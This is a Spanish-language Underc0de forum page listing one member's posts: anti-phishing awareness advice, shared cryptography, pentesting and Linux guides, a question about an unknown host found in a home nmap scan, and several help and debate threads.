• Dar charla a todos los empleados de la compañía, donde el "speaker" sea alguien con conocimientos en el área de seguridad informática y le muestre pequeñas demostraciones de lo que puede llegar a ocasionar un despiste por parte de ellos. Concientizar a las personas que operan dentro de la empresa es fundamental, hacerle saber la responsabilidad que llevan a cabo en su labor día tras día, ya que nunca se sabe cuando puede ser víctima de un ataque como este. Ya que, la empresa u organización deberá invertir en formaciones de capacitación; manteniendo informado al operario del peligro que puede estar generando para la empresa.

• Sospechar de los mensajes inesperados que dicen ser urgentes y confidenciales (no olvidemos que en mi ejemplo dejo la terminal en ejecución, por lo que el atacante quiere que caiga lo más pronto posible para no estar todo el día esperando). Además de que llama aún más la atención en estos casos.

• Fijarse en la redacción de los mensajes sospechosos recibidos. Suelen estar mal escritos o con faltas ortográficas. Sobre todo, cuando un ruso usa el traductor de Google para hacer un phishing a un latinoamericano. Nos encontramos con incoherencias.

• Tener precaución al seguir enlaces en correos electrónicos, aunque sean de contactos conocidos.

• Tener precaución al descargar ficheros adjuntos de correos, aunque sean de contactos conocidos. Digo de contactos conocidos, porque no olvidemos que muchos cibercriminales se nos acercan (o se le acerca a la víctima) de forma presencial, o en redes sociales para conocerlas y así quitarle la suficiente información.

• Tener siempre actualizado el sistema operativo y el antivirus. En el caso del antivirus comprobar si está activo. Soy partidario de la frase "el mejor antivirus es la precaución". Me refiero a que hay que ser precavido cuando se hace uso de internet. Sobre todo, si trabajamos para una empresa/organización.


CONCLUSIONES

La ingeniería social no puede ser eliminada completamente, es un serio problema y es uno de los más grandes en las organizaciones.
Es un tema conocido en el ámbito de la seguridad, pero que poco se habla en las organizaciones sobre su prevención.
La educación y capacitación, continua y dinámica, es el método más eficiente para prevenir los ataques de IS (Ingeniería Social). 
Las organizaciones deben establer una clara y fuerte política, incluyendo estándares, procesos y procedimientos para ayudar a reducir la amenaza. La idea fundamental, es que los empleados sean capaces de identificar un ataque para que puedan minimizar los efectos o consecuencias del mismo.


Muchas gracias por tomarse el tiempo de leer.
#33
Hola mundo Underc0de, les comparto este pequeño documento de 19 páginas donde se detalla los métodos criptográficos más populares y su función.



Índice

*¿Qué es la criptografía?

*Historia de la criptografía

*¿Por qué es necesaria la criptografía?

*Usos de la criptografía

*One-time pad

*Cifradores de flujo y cifradores de Bloque: WEP (RC4) y ECB

*Cifrado asimétrico: RSA y Diffie Hellman

*Funciones Hash criptográficas

*Epic Fails criptográficos




Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Virustotal: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#34
Hola compañeros de underc0de, les dejaré un manual en el que se explica detalles a la hora de realizar Pentesting.

Herramientas, soluciones, métodos y muchas cosas más explicadas de manera tan sencilla que, con poco conocimiento de inglés y un poco más de sentido común se puede comprender tranquilamente.

Tabla de contenidos:

*Introducción a Kali

*Gathering Intel and Planning Attack Strategies

*Vulnerability Assessment

*Web App Explotation - Beyond OWASP Top 10

*Network Explotation on Current Explotation

*Wireless Attack - Getting Past Aircrack-ng

*Password Attacks - The Fault in Their Stars

*Have Shell Now What?

*Buffer Overflows

*Playing whit Software-Defined Radios

*Kali in Your Pocket - NetHunters and Raspberries

*Writing Reports



Link del libro: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Virustotal: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#35
Qué tal compañeros del foro, hace ya semanas, hago cada tanto escaneos con NMAP de cualquier tipo, con cualquier tipo de comandos quiero decir, y siempre cuando hago el scanner a 192.168.0.1/24 Me salen los dispositivos conectados... ¿No? Bueno, si, mágicamente me salen todos los dispositivos xD


La cuestión es que conozco a los dispositivos...
El 192.168.0.208 es mi PC principal, el 192.168.0.228 es mi teléfono y así con otros dispositivos que tienen mi consentimiento de estar en la red, además de darme cuenta por la firma del dispositivo.
Mi pc (.208) tiene la mother marca gigabyte y la reconoce, mi telefono es Motorola y es reconocido, y mi notebook es Samsung y tambien es conocido. Cosa que cualquiera con mínimo de conocimiento con NMAP sabe...

El problema es que hay un host que no se de donde sale, y que cualquier tipo de escaneo con cualqueir tipo de comando siempre me sale la misma respuesta que les dejaré a continuación.

Verán, me lo reconoce como INTEL, mi deducción es que se trata de un ordenador por la firma... Pero solo hay dos PCs, la mia y mi notebook que son reconocidas con otras IPs...

En mi edificio... digamos que no son muy hackers los vecidos xD (los conozco, a algunos).
Entonces, no me atrevo a decir que me adivinaron la pass porque es complicada (La pass es: @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta%3Ck0@ Dudo que sea fácil de hacer alguna fuerza bruta).

Coloco la pass porque no es gran cosa que sepan la pass de mi router. Eviten intentar con mi correo la pass porque es muy distinta.

Ahora, la respuesta de NMAP con dicho host es:
Código: text
Nmap scan report for 192.168.0.254
Host is up (0.0099s latency).
All 1000 scanned ports on 192.168.0.254 are closed
MAC Address: 00:50:F1:64:CB:63 (Intel)


Bueno, nada, eso.. No sé a qué se debe.. Capaz si me crackearon la pass.. pero resulta que siempre en ese host me da el mismo resultado y la MAC no la encuentro en ningún dispositivo de casa.

Capaz sea de ignorancia mía, pero necesitaba la duda...
La IP del router es 192.168.0.1 y me lo toma como linux y todo eso...

Dejen su veredicto, ¡saludos!

MODIFICACIÓN: Cuando hago ping al host sospechoso me salta lo siguiente:

Código: text
PING 192.168.0.254 (192.168.0.254) 56(84) bytes of data.
64 bytes from 192.168.0.254: icmp_seq=1 ttl=64 time=1.98 ms
64 bytes from 192.168.0.254: icmp_seq=2 ttl=64 time=1.96 ms
64 bytes from 192.168.0.254: icmp_seq=3 ttl=64 time=2.04 ms
64 bytes from 192.168.0.254: icmp_seq=4 ttl=64 time=2.28 ms
64 bytes from 192.168.0.254: icmp_seq=5 ttl=64 time=1.41 ms
64 bytes from 192.168.0.254: icmp_seq=6 ttl=64 time=3.53 ms
64 bytes from 192.168.0.254: icmp_seq=7 ttl=64 time=1.40 ms
64 bytes from 192.168.0.254: icmp_seq=8 ttl=64 time=1.34 ms
64 bytes from 192.168.0.254: icmp_seq=9 ttl=64 time=1.33 ms
64 bytes from 192.168.0.254: icmp_seq=10 ttl=64 time=3.04 ms
64 bytes from 192.168.0.254: icmp_seq=11 ttl=64 time=2.35 ms
64 bytes from 192.168.0.254: icmp_seq=12 ttl=64 time=2.44 ms
64 bytes from 192.168.0.254: icmp_seq=13 ttl=64 time=2.38 ms
64 bytes from 192.168.0.254: icmp_seq=14 ttl=64 time=6.87 ms
64 bytes from 192.168.0.254: icmp_seq=15 ttl=64 time=2.39 ms
64 bytes from 192.168.0.254: icmp_seq=16 ttl=64 time=1.93 ms
64 bytes from 192.168.0.254: icmp_seq=17 ttl=64 time=2.06 ms
64 bytes from 192.168.0.254: icmp_seq=18 ttl=64 time=2.36 ms
64 bytes from 192.168.0.254: icmp_seq=19 ttl=64 time=2.35 ms
64 bytes from 192.168.0.254: icmp_seq=20 ttl=64 time=2.32 ms
^C
--- 192.168.0.254 ping statistics ---
20 packets transmitted, 20 received, 0% packet loss, time 19032ms
rtt min/avg/max/mdev = 1.331/2.392/6.873/1.157 ms
#36
GNU/Linux / Introducción al mundo Linux
Noviembre 20, 2017, 03:42:32 AM
Buenas, hago este aporte para toda la comunidad de Underc0de.

MODIFICACIÓN: No soy profesor, no sé enseñar. Es por eso que no hago introducciones. El material fue hecho por mi profesor y se los comparto porque considero que es genial para empezar.

Examen de virustotal en el enlace: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Examen de virustotal en el archivo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Introducción a la introducción del mundo linux:



Bien, en esta introducción veremos cómo funciona, qué de interesante tiene, y lo más importante a tener en cuenta a la hora de elegir una distribución de linux.

_Qué es linux.
_Veremos qué es una distribución, con una gran cantidad de distribuciones de ejemplo.
_Distribuciones especializadas en un ámbito laboral/educativo.
_Razones para utilizar linux.
_Arquitectura de GNU/Linux.
_Procesos.
_Usuarios.
_Archivos.
_Qué es el kernel.
_El bootloader.
_Daemons.
_El Shell.
_Servidor gráfico.
_Desktop evironment.
_Aplicaciones.


Saludos a todos.

LINK: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#37
Qué tal compañeros del foro, he estado husmeando por ahí, queriendo saber cómo instalar Adobe Flash Player en Kali (con Mozilla Firefox), y nada me ha resolvido el problema...

Quisiera saber quién puede darme algún material que haya usado y funcionado, sea video u escrito.

¡Saludos!
#38
Debates, Reviews y Opiniones / Sistema Operativo
Noviembre 09, 2017, 02:41:09 AM
La eterna guerra de los sistemas operativos, que cuál es el más seguro, cuál es el más rápido, cuál es más bonito...
Yo, en mi opinión, escojo a GNU/Linux, por muchas razones. En especial a Debian, sobre todo por la libertad y el mero hecho de ser gratuito -OJO, no es porque no pueda pagar, ni porque no me gusta pagar porque soy tacaño.. Sino que, considero que el Software, la informática, y muchos servicios como la seguridad, deben ser gratuitos (viva Stallman)- con sus softwares, una comunidad estupenda y que te dan ganas de quedarte hablando horas con personas del mísmo círculo. ::)
Siendo sincero, si alguna vez alguien me ve con Windows, es porque hay programas que no encuentro para GNU, programas que debo utilizar en mi universidad.

Ahora, quisiera que evalúen lo siguiente, más allá de la estética.
Preguntense lo siguiente:
*¿El sistema operativo que utilizo es seguro o estoy siempre batallando contra virus y malware?
*¿Es el más estable?
*¿Es el mejor entorno para las tareas que quiero llevar a cabo?
*¿Es el más veloz, flexible y eficiente?
*¿Es económicamente redituable o las licencias son altamente costosas tanto del sistema operativo como del software que utilizo para mis tareas habituales?
*¿Lo utilizo por novedad o porque quienes me rodean lo utilizan?

Y la pregunta del millón... ¿Lo utilizo sólo porque vino instalado en mi PC?
#39
Off Topic / ¿Por qué WPA/WPA2?
Noviembre 08, 2017, 04:08:41 PM
Bueno, verán. En el grupo de WhatsApp está prohibido hacer preguntas. Y me redirigieron acá. Y nada, el nombre del grupo es Underc0de (WPA/WPA2) Y me gustaría simplemente saber :)
#40
Hola amigos del foro, un compañero tiene un problema con su nueva pc a la hora de jugar un videojuego. La placa de video está en el error y el motivo también, pero no sé cómo hacerlo y si ustedes tienen alguna otra solución podrían decirme, darme links de descarga de drivers, entre otras cosas. Muchísimas gracias, acá está la imagen.